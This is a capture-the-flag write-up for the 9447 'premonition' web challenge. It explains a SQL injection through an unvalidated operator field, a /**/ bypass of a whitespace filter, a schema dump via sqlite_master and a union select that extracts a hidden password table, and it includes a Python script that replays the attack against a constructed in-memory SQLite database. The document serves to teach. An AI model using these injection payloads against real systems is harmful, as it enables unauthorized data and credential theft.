premonition

9447 CTF Web Challenge: 140pts

Challenge Description:

"There's been some weird occurrences going on at our school. Teachers answer questions as though they knew the answer in advance, test results being handed out before the test, and now a weird web form giving info about us. Can you find out what weird information is on it?

Find the page at http://premonition-p8l05mpz.9447.plumbing:9447"

Material:

Solution:



1) Analyze web page

   Looking at the website we find a form which lets us query a database of test scores.
   We control 3 inputs: the field to search, the value to find and the operator used for the comparison.

2) Finding the sql injection

   Targeting the 3rd field (the operator), we find the sql injection by passing "ineq=' or 1=1".
   Two important things come out of this: all whitespace is stripped from our input, and we learn the server is using sqlite.
   For every later injection we therefore replace each space with the inline comment "/**/", which sqlite accepts as a token separator but the filter does not remove.

3) Dumping the schema

   Because it is sqlite, the whole schema can be dumped in one query: the sql column of the sqlite_master table holds the CREATE statement of every table.
   In this case, we union select the sql field from sqlite_master.
   The output gives us the structure of the 2 tables in the database as json. Below it is formatted for clarity.

4) Selecting all the passwords

   Clearly the s3ekr17_passwords table is the one most likely to contain the flag.
   To dump all the passwords, we use a union select on that table in our injected operator, matching the column count of the original query.
   Each password was a single character of the flag, and its position in the flag was given by the userid.
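The whole chain (probe, whitespace bypass, schema dump, flag reassembly) as an added, self-contained example against a constructed in-memory SQLite database. This is not the challenge's code or its real data: the table layout, the exact shape of the vulnerable query (all three inputs spliced in after whitespace stripping, only the value quoted), the column count and the sample flag are assumptions made so the example runs offline; only the s3ekr17_passwords table name, the sqlite_master trick and the "/**/" separator come from the writeup.

```python
import re
import sqlite3

# Constructed stand-in for the challenge back end (not the real schema or flag).
SAMPLE_FLAG = "9447{not_the_real_flag}"


def build_db():
    """Hypothetical database: a scores table the form queries, plus the secret table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE scores (id INTEGER, student TEXT, score INTEGER)")
    db.execute("CREATE TABLE s3ekr17_passwords (userid INTEGER, password TEXT)")
    db.executemany("INSERT INTO scores VALUES (?, ?, ?)",
                   [(1, "alice", 91), (2, "bob", 57), (3, "carol", 78)])
    # one flag character per row; inserted in reverse so row order != flag order
    # and the userid really is needed to put the characters back in sequence
    db.executemany("INSERT INTO s3ekr17_passwords VALUES (?, ?)",
                   reversed(list(enumerate(SAMPLE_FLAG))))
    return db


def vulnerable_search(db, field, value, ineq):
    """Assumed shape of the challenge's query: every whitespace character is
    stripped from each input, then the inputs are concatenated into the SQL.
    The operator (ineq) is never validated, which is the injection point."""
    strip = lambda s: re.sub(r"\s", "", s)
    query = (f"SELECT id, student, score FROM scores "
             f"WHERE {strip(field)} {strip(ineq)} '{strip(value)}'")
    return db.execute(query).fetchall()


def probe_triggers_error(db):
    """Step 2: the writeup's probe ineq=' or 1=1. After stripping it becomes
    'or1=1 and the query no longer parses; in the challenge the resulting
    error is (assumed here) what revealed the SQLite back end."""
    try:
        vulnerable_search(db, "score", "x", "' or 1=1")
    except sqlite3.Error:
        return True
    return False


def spaced_payload_fails(db):
    """A payload written with ordinary spaces collapses into one garbage token
    once the filter strips whitespace, so it cannot work as-is."""
    try:
        vulnerable_search(db, "score", "x",
                          "= '' union select type, sql, name from sqlite_master --")
    except sqlite3.Error:
        return True
    return False


def sp(payload):
    """Replace every space with the inline comment /**/. SQLite treats the
    comment as a token separator, and the server's filter leaves it alone."""
    return payload.replace(" ", "/**/")


def dump_schema(db):
    """Step 3: union the sql column of sqlite_master onto the original query.
    The original SELECT returns 3 columns, so the UNION selects 3 as well;
    the trailing -- comments out the quoted value the server appends."""
    payload = sp("= '' union select type, sql, name from sqlite_master --")
    rows = vulnerable_search(db, "score", "x", payload)
    return [row[1] for row in rows if row[1]]   # the CREATE statements


def dump_flag(db):
    """Step 4: pull (userid, password) pairs and rebuild the flag in userid order."""
    payload = sp("= '' union select userid, password, 0 from s3ekr17_passwords --")
    rows = vulnerable_search(db, "score", "x", payload)
    return "".join(pw for _, pw, _ in sorted(rows, key=lambda r: r[0]))


if __name__ == "__main__":
    db = build_db()
    print("probe errors out:", probe_triggers_error(db))
    print("spaced payload fails:", spaced_payload_fails(db))
    for create in dump_schema(db):
        print(create)
    print("flag:", dump_flag(db))
```

The sp() helper is the only thing that makes the union payloads survive the filter; dump_schema() shows the schema leak that points at s3ekr17_passwords, and dump_flag() shows why sorting by userid (rather than trusting row order) is what reconstructs the flag.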


Flag: